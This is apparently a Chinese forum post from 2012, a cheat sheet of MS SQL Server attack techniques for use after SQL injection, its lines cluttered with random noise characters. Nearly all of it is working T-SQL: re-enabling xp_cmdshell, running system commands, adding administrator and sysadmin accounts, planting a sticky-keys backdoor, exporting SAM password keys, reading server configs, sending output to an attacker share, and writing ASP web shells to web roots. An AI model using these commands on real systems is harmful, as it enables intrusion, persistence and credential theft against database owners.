1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
/ H }( c) o2 ?- ]. v恢复方法:查询分离器连接后,& D6 u/ ~5 V3 Z U3 T- M1 e
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int ! T3 o" g9 K' _
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 6 u! \9 {! K+ ]9 @) Q7 _
然后按F5键命令执行完毕2 ?0 K6 v, b. v: X1 M
. I4 _$ @0 V' L+ \2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
( L$ E0 A# H, L. f' a恢复方法:查询分离器连接后,# y+ b$ P3 x" j1 f
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
; q2 v/ A3 C% L2 d7 f第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'$ J3 U* i$ C* e, \
然后按F5键命令执行完毕# M0 f x1 k3 `# s- m/ _1 G: {
0 L1 i4 U& N; A8 ~( O
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
8 }, |3 ^/ t8 w恢复方法:查询分离器连接后,
( c/ s, e4 [, N$ W第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
& H, o8 e# w. s) i. t1 n+ A' S第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' " n ^0 ~1 S4 R: I W: ~+ o
然后按F5键命令执行完毕
& k s( W& B$ ~& X0 t1 X3 ]2 s% ]0 T+ d0 k0 J# y
4 终极方法.5 A$ O& h/ u7 q- Q6 F: P& c' U
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:, n" r0 b4 a+ ], P! P J X8 z
查询分离器连接后,
. i9 W( m. g/ K _2 l8 B2000servser系统:, F1 L- i" v& o1 g* `* `1 l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
* g# o/ K/ o# C8 q" |
' M7 N- @( E \$ h. mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add' \, C4 f& n2 v' ^
% A) q9 W/ G4 e* w$ jxp或2003server系统:
/ \4 P2 Z5 U# \- {' x$ R0 e
" d0 R; y6 F5 _ r% Y4 o+ u4 I( vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'6 b: ^5 A1 r& N
' C: J& o6 P, Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'( r1 g% c- \( I
* S* z9 u% {# o; p
0 v6 j% Y# \) ?, k6 o5 ~- |+ z7 J五个SHIFT6 E9 A7 |- v1 ?8 a0 J* A3 f
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';+ G* N; p5 C9 b
4 j+ ?! E7 B4 A" {9 M
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 7 B- D) J, S% J6 f- |+ E+ l
$ f3 X6 R; B% U- W% L3 P1 ^3 H
xp_cmdshell执行命令另一种方法
5 g- A/ b: n: Hdeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
A% ]2 ~" C" [9 r% r# O) h. n# z* A& O
判断存储扩展是否存在
6 E$ \8 ?4 J9 l0 {0 g: U7 ^Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'" n( _' ~! ~: a! S3 \
返回结果为1就OK# U/ d/ F: S& C7 B( K, s
- N- e3 W( @! g
9 o' P5 {. n/ Y' }5 J上传xplog70.dll恢复xp_cmdshell语句:) @' v" l9 S' M p! c( J+ U# C
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
0 X1 u( h' ]/ |/ @. I8 o z: P( Q$ h
否则上传xplog7.0.dll
- U( ]3 o# w# O) B/ h2 J7 b, nExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'" V9 b, w; ]4 P! r
. g( Z8 c1 X2 I0 g1 M0 V
6 P0 p4 L/ X" X3 v. F$ ~! f- B! H: ? F, i( P' u* k/ z' a
首先开启沙盘模式:
- I. Q# t$ } B; c9 O2 L7 y8 Dexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
7 f8 X. I7 g9 ~& Z2 s* T! M- [0 v7 i3 z; L! E
然后利用jet.oledb执行系统命令
8 h! S$ N. w" ~! e) P. u0 `8 q# w( oselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
; W3 p; R# q, T8 z返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
2 H3 j/ u q! p! `- n6 e6 S* T+ X; z: |# a# A6 b
$ ]* Z H+ V5 g% _! A: F! l, @' ^& A
/ T C- u8 l. X' _恢复过程sp_addextendedproc 如下:
$ e% F; _% V" Ycreate procedure sp_addextendedproc --- 1996/08/30 20:13
8 d+ F5 H- V2 O j+ Y. d@functname nvarchar(517),/* (owner.)name of function to call */ ! o7 T! ?+ S) X, B8 Y; q$ ^
@dllname varchar(255)/* name of DLL containing function */
# T& b+ `7 w4 q0 Eas
! U/ A5 K' p8 @set implicit_transactions off
8 X8 @ w# Q0 M& _2 O5 y, b- Pif @@trancount > 0 - z# M: r% X) X4 H1 _3 F& H8 E
begin
6 A, V S! T0 u$ M, X2 B- \' {* braiserror(15002,-1,-1,'sp_addextendedproc') * b) E) [: G" K1 w' e
return (1)
5 U9 s2 n9 B; j" pend
. Z( R( w* C2 xdbcc addextendedproc( @functname, @dllname)
+ s8 S2 E. `4 ]return (0) -- sp_addextendedproc # z* q! a" x: O$ R8 j% n
GO % V7 a, T% {, `
5 p* z5 r/ B4 p! b7 a2 _9 }8 L* E3 j
' g' a. I& w7 K导出管理员密码文件- L% F% o# A: Y2 u; b5 f
sa默认可以读sam键.应该。
e$ C& ^) D3 r7 areg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
4 A' w( [+ w1 R- U5 nnet user administrator test
2 v2 v$ o. h- z- y% s- N& n用administrator登陆.
* _1 X: q, s; z% q5 J用完机器后0 ?. X2 T/ E) f/ p/ w$ W9 X
reg import c:\test.reg
- t' R5 d# }/ @5 o根本不用克隆.& C7 z! O8 C! [
找到对应的sid. 6 y h) {- A) L& q
0 q6 F) n4 \+ a9 Y5 c& R
) K g2 r$ C9 A7 d. L: v; l
' z0 A2 D6 | R8 X
恢复所有存储过程7 {' U3 u; k+ o' d: {" e
use master ; `: l# X$ a/ u1 x( J
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' * G5 z) b$ E+ q5 o9 V! O; f
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' ; ?# J3 r# K# Q9 g" i) e1 l/ }
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
# a0 V8 g' _' n" S4 Yexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
1 y L+ k! a7 B# dexec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
& r% v* b. H! Eexec sp_addextendedproc sp_OACreate,'odsole70.dll'
5 [; ], O; V3 W) q" q: i8 Texec sp_addextendedproc sp_OADestroy,'odsole70.dll'
9 A' v. ?6 J2 }6 cexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
; u' C. T7 ]3 B) M7 e/ ^exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' 2 o7 K+ t8 f/ j: l, r
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' 8 E8 {1 L0 ~2 o( q& r9 p
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' - @6 n/ [ F- a4 f' d
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
" r6 ]; _( e9 e! \7 oexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' # |3 C4 E5 b! [2 _) F
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
: e+ o) b& M8 q, R7 Qexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' / \- \5 E6 T3 v, ^- B* `
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' 0 [$ c4 ^9 {" n: }8 W* U9 ^
exec sp_addextendedproc xp_regread,'xpstar.dll' , L B4 ~3 E. K8 T0 H4 j/ _
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
v% T, ?' S/ w& M5 P& [, a0 O* rexec sp_addextendedproc xp_regwrite,'xpstar.dll'
7 Y; B0 v, g3 Y9 G' S4 J$ wexec sp_addextendedproc xp_availablemedia,'xpstar.dll'# ^1 _, f* y7 C6 A5 ]
7 G2 H5 Q) n5 g/ @( Z" I4 Q
: n& |9 n# X# ?7 R( [) l
建立读文件的存储过程
$ Q$ S; L; R9 G2 ^: d( H4 R; ?Create proc sp_readTextFile @filename sysname1 @2 E$ u$ T1 G
as
* S6 Y' [( _$ M
7 A" [5 e: ]6 N l- G begin " x$ T/ J Y% H0 Q2 N, }# b
set nocount on W- p: z3 y8 v& u! G* T/ i
Create table #tempfile (line varchar(8000))
9 n6 z# _& C; @4 }6 A: ~ exec ('bulk insert #tempfile from "' + @filename + '"'); R& p* t' U& |" L
select * from #tempfile
5 G4 U0 n7 [4 G5 u+ h drop table #tempfile- Q2 F2 G# o- Z
End
% r, Y% S! E8 j: E3 K8 m( Z# n1 t" o# p
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
( d8 r# r T7 R7 K" ?; K2 G/ }: ^查看登录用户
3 H9 s8 g: \6 y- ^% DSelect * from sysxlogins1 g4 K; \9 A! v' h, F
. a6 }* g+ Q7 J( u. w& K" k. |+ [1 X
把文件内容读取到表中2 Y: ?' L/ a$ M/ Y3 M' f
BULK INSERT tmp from "c:\test.txt"5 ~0 U1 d, F( t/ ]9 O
dElete from 表名 清理表里的内容3 W ^3 f& ~/ L3 H
create table b_test(fn nvarchar(4000));建一个表,字段为fn
. m- |2 i- T$ X6 E
! m) U0 n3 |2 n$ U! o
+ K. o# d" i+ W4 p2 Z加sa用户# [ s/ z' k% t
exec master.dbo.sp_addlogin user,pass;/ `* n! M9 u; v& |0 b
exec master.dbo.sp_addsrvrolemember user,sysadmin
1 d4 l8 r5 A1 ]0 b" Q/ {# h& [5 v1 ?2 u4 K* ~
2 L; U5 m( @& q- p
3 T' k, {' @: Y2 e读文件代码
+ }, ]" R c+ g; i0 udeclare @o int, @f int, @t int, @ret int4 j$ X" F5 h! S, v! A; g, S
declare @line varchar(8000)
/ o% U" I% |8 H: }+ v b, Eexec sp_oacreate 'scripting.filesystemobject', @o out0 t/ u: W7 s0 m5 `
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1( r, B& e: L, y- w: |) i- B
exec @ret = sp_oamethod @f, 'readline', @line out
- n% o+ I# c1 T* \1 `% ~9 O- c swhile( @ret = 0 )
+ Y) H% D: i( H: n& f, T3 ubegin
N0 E- ~+ ]' G H a2 F5 Iprint @line9 S4 u6 l0 m% }/ J
exec @ret = sp_oamethod @f, 'readline', @line out8 B, W2 \5 F+ Q5 e5 q! d
end: l5 i" o4 C; Y/ T3 `
5 Q5 b) x" \5 M
; [9 A# \5 |1 K+ P( N! K写文件代码:% E/ j8 v: B* x
declare @o int, @f int, @t int, @ret int/ M: h- U6 z1 ~9 F& ?
exec sp_oacreate 'scripting.filesystemobject', @o out8 J4 e. i2 q. K
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1( n6 O; e- X* ]6 U4 B# D
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》$ i2 O5 m; l- G& u
, J! S0 J# Y) v( ]$ s" l. q! Y1 l5 x! ~/ A! Z5 Z. M
添加lake2 shell. @9 M8 [" ?5 X3 }& {% w9 X) k* D
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
$ ?1 w% A7 D5 z. }1 i+ Wsp_dropextendedproc xp_lake2
( Z: U$ I1 V# qEXEC xp_lake2 'net user'- f+ V" r; } m6 \4 g# Q% f
( n' @2 U4 r g; f7 k) h5 d+ R& y- J; Z; `
得到硬盘文件信息
/ ?8 B8 N. t# x& k: ` ^. D--参数说明:目录名,目录深度,是否显示文件 7 `8 k) z L1 O5 H0 @4 s2 f- i
execute master..xp_dirtree 'c:' ) f) I/ Y3 q; a+ R# Y
execute master..xp_dirtree 'c:',1
: U# f4 Q, c: iexecute master..xp_dirtree 'c:',1,1 " [. I! {0 u2 j! M; H9 I1 T" K
5 F6 I0 [' [% d. J
3 U/ H: l$ l' h7 c
读serv-u配置信息
( X) @( N) e3 kexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
8 d' m/ H, P0 Oexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
8 x$ }( ?* `- S
$ I, Y8 `1 [7 x3 F9 k$ e* u通过xp_regwrite写SHIFT后门4 U& O; f: W1 C9 G. F2 e
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--5 [0 V9 _% g7 ^6 T( {3 G
- I9 Q% d8 J3 f
$ { z8 ]) ?6 d% g
- r5 v: S9 F: B; m) }2 E+ h找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';* m) E* T6 ]3 I
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
9 a6 [- Y7 l4 R) b' x7 \; O0 |! p+ m3 O0 g8 ~) J: e
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'1 ^2 u+ p! O: e4 {7 p
6 r+ y' B8 C% R* L
. _4 f# y3 A: u$ [9 W3 H4 M! e. }/ a" r$ C0 j0 j
sql server 2005下开启xp_cmdshell的办法% I4 C0 G ]8 Y9 O5 _+ ^5 z* E1 F- B
, u, ?) A( i0 D: s0 H
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
( ?* a m7 E/ V" e7 |% C# ~9 c0 M: X. z4 p5 I4 y, Q7 e0 y
SQL2005开启'OPENROWSET'支持的方法:0 Y7 W: a: `, U9 d. Z
% v; v# t: u$ q& O1 f. w6 Y) h0 R
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
; r2 n! q; y3 M, P9 ^$ r) X# k, r+ i/ {5 V% E# [. ~; b, o& `
SQL2005开启'sp_oacreate'支持的方法:6 s8 B# S4 u a9 q" p
$ G% C/ Y4 `; x `3 Q& k
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;) ] i8 Q+ t5 `$ A/ B8 f
7 Y% ^1 G* L( |# w6 w& b, x; h# g
1 ?5 u& w. }) g5 ^# Z
. r9 q4 {6 D' ~, d# l
6 z/ [: w% [7 ?/ F' F8 F0 S, _; M3 ~0 e8 Z, Q, i5 c' A
6 N: z( z. k( v( n$ c5 U
$ O. `1 b. k: ?% h) g8 h( Q! `3 t8 ~+ p
- I$ q8 H' u/ N) T1 F4 \, x/ C: M1 z
* T! N. z0 @+ F L* v
% n( N* Q( K C! w' m5 k% f/ b! l0 j5 q1 ~0 B R& `2 G$ R0 \. x
7 y8 ]- I) n' ^8 P
: V% U1 h/ K& Y; H& P3 z6 w4 ?& k6 h3 _
4 w' k% A4 k0 m3 C) g3 Q' v: d0 k! H8 o1 v/ u% z3 U0 {
6 E9 C& G6 e% ^1 N. g6 _5 F" S
( T4 l3 X6 L9 b: J" ]% i3 Q
" v3 ^% y& ^8 O B8 b( d0 E# S
; {6 `8 [. C& T$ E* A
/ ^; {& c0 k8 F2 p% F" j% d
. c6 | X, F0 a m& p8 S8 x以下方面不知道能不能成功暂且留下研究哈:5 G0 T# B* T$ Q$ k5 Y! ?, V" W6 s
4)* y2 K( |6 }+ W ?) L
use msdb; --这儿不要是master哟$ i# o# v4 k6 Q8 L( B3 k
exec sp_add_job @job_name= czy82 ;
9 o* L5 @& b. \$ {+ _( S- N T: h& }, Lexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
# ]( a+ t" g- I- h6 u7 c; oexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;; |( G j5 F8 `& a$ ~7 q1 `
exec sp_start_job @job_name= czy82 ;
; l/ J, Y/ B2 L/ u3 b y6 z# }( K" i! m6 O7 I6 D( Y
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以7 p$ V+ D/ z3 x5 x' t4 S& w
执行tsql语句了.
8 C0 S" B7 h6 {5 v7 h对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
/ ? u& z* q1 r+ A* `& [第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
4 J+ k# U; H V+ dnet start SQLSERVERAGENT
7 E6 E3 Y& q9 \5 N7 [$ U& K# o; k- l1 m- o
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
9 G1 u4 Y8 h/ Y7 S! t2 ]7 {( o; `USE msdb
) l' ^! H V+ c2 V% W8 f1 zEXEC sp_add_job @job_name = GetSystemOnSQL ,9 ^2 o8 \: h# h
@enabled = 1,* x" l5 `' t* N+ p( h3 z
@description = This will give a low privileged user access to1 d) O2 P) n: `+ O. k9 }
xp_cmdshell ,
, @# `; A' c9 R+ F/ N@delete_level = 1
3 q2 K7 O$ j" i; V* r" ?6 yEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
+ S- S) b2 L! l% R) P" ^6 V# D@step_name = Exec my sql ,
# Z( C" Q* x, U2 r2 F' P4 e1 s4 j@subsystem = TSQL ,
+ f/ W1 k _% o@command = exec master..xp_execresultset N select exec1 Z) A; U; p# B8 T3 I0 O
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master . L5 G, G6 J4 P' H
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
5 h1 I4 _8 X/ l( P$ W4 O& t@server_name = 你的SQL的服务器名 $ Q$ z8 q! k& C# h5 W- E# `
EXEC sp_start_job @job_name = GetSystemOnSQL 6 N7 |) C( P0 ~ m
( \8 }" k$ e; d- o7 r
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
1 d: M2 _; |- g6 V H, Y, g; i% N3 r* Y才让我们可以以public执行xp_cmdshell
( T! `* [: p7 n9 M. M& V4 i8 C8 }
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
3 m! Q; M O# { o C/ n$ r在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968* R: }* F) C' W
- |4 t( d, N: L0 |3 ^- C
USE msdb$ c& v2 l. I" J6 `
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
* V& p, Z B0 K. r7 T@enabled = 1,6 C+ c U, r T' }
@description = This will create a file called c:\sqlafc123.txt ,
+ Z' a0 y0 Q0 M" A@delete_level = 1
% ]4 z- \# x1 f( Q& v' { k7 Y! w FEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
u: U; L/ a5 {) F@step_name = SQLAFC ,
4 N- c9 _; O _9 q* W' h@subsystem = TSQL ,
. W1 }- }4 z) u+ _. a2 R- o5 u. W0 q0 r! U@command = select hello, this file was created by the SQL Agent. ,
9 N# \/ A1 d. d5 u8 J$ O@output_file_name = c:\sqlafc123.txt
2 y3 c4 p1 ]6 W' B* a" @' ^EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
3 O" g) l" A# `& I n. g@server_name = SERVER_NAME
0 f, E4 C4 @2 Z) W# ^EXEC sp_start_job @job_name = ArbitraryFilecreate
~8 T- I3 |5 T `* ~; U3 W! L5 U: E. T
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
7 e/ I) j6 P# M8 ^: |( i" I* |& K" M7 O& s0 r( i6 C6 q0 U
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19, X8 o- P* W( D3 b
----------------------------------------------# p5 U$ h, n# S8 o
hello, this file was created by the SQL Agent.
4 v" D3 b9 Q, z7 p
5 K# A- O2 Y8 v6 `(1 ?????)
, `3 q3 R( B+ O3 M% u! G5 S# G
% [9 I7 F" V' z0 B( `$ m, ]所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员3 j% m% D2 d/ A5 V5 a5 a. ?
命令的vbs文件到启动目录!% x7 Y! r! E+ k( j$ k# @- F
0 {' _% a- _9 h- T" j& V
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)8 X+ O6 N) G# M4 `- j" X
关于sp_MScopyscriptfile 看下面的例子
3 E# ^6 K6 r& s- @) |7 t3 Cdeclare @command varchar(100) & F/ }- U3 @9 v. [
declare @scripfile varchar(200) 8 I* `, G( p3 f( [7 d4 J
set concat_null_yields_null off
/ ^: |; }* i( D$ |1 x7 C' K' ^select @command= dir c:\ > "\\attackerip\share\dir.txt" ) T* a; S* i7 a# \) S6 ?# Y1 A
select @scripfile= c:\autoexec.bat > nul" | @command | rd "
5 Y3 e: f+ z0 `2 A0 Oexec sp_MScopyscriptfile @scripfile ,
) m& Y6 u7 q: r! O% v- J- [$ \3 m- b
这两个东东都还在测试试哟
- J; |7 q2 ?0 r让MSSQL的public用户得到一个本机的web shell : [7 `0 X8 j: m, D& N- Z
8 X) ~' L6 X3 o/ M
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,+ s( \1 T! [8 A+ l
--@query= select <img src=vbscript:msgbox(now())> 2 h; X* r. {# u1 X' N/ R. f* [) }
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
# e! g6 F5 K, Z3 a6 c- d3 h! U@query= select
# ?$ e# y0 u, n% f7 C<%On Error Resume Next 0 H& Q1 y! c" O9 V6 n+ e
Set oscript = Server.createObject("wscript.SHELL") " R3 s3 g" F3 x/ K4 ~/ ~* P
Set oscriptNet = Server.createObject("wscript.NETWORK")
) s4 l' G, H8 r2 l! p6 R0 GSet oFileSys = Server.createObject("scripting.FileSystemObject")
0 E4 z- J' F; Y: i2 [8 mszCMD = Request.Form(".CMD") 4 @8 X" ], w0 p! W: x. D. _ G
If (szCMD <>"")Then
- a# m- T2 ~0 XszTempFile = "C:\" & oFileSys.GetTempName()
% W0 n4 l# |& \% f1 }Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
/ k- h+ T% u7 ?Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
. Q+ e# T2 O. [3 xEnd If %> & _( F$ R, ?% ~3 \! P4 W( r- ]0 `
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> & }: `: z" v! w. u U3 n
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> 4 ]0 @2 _& I( z) t# H: A/ \
</FORM><RE>
9 _' ^6 r% t. w7 J. h( y. V; @; b2 s<% If (IsObject(oFile))Then
& Z% p+ s+ R$ x* m, BOn Error Resume Next
' b g( j4 C2 `2 ~; l, xResponse.Write Server.HTMLEncode(oFile.ReadAll)
! F3 g" O- Y3 o5 E4 \! H, ^oFile.Close
I9 J7 X; z3 T( X6 BCall oFileSys.deleteFile(szTempFile, True) 6 `; A1 T- T; F0 o- K
End If%> / K/ t O7 K* D7 Q
</BODY></HTML>
! a& D3 Q W1 z |
发表于 2012-9-15 14:37:30
收藏
支持
反对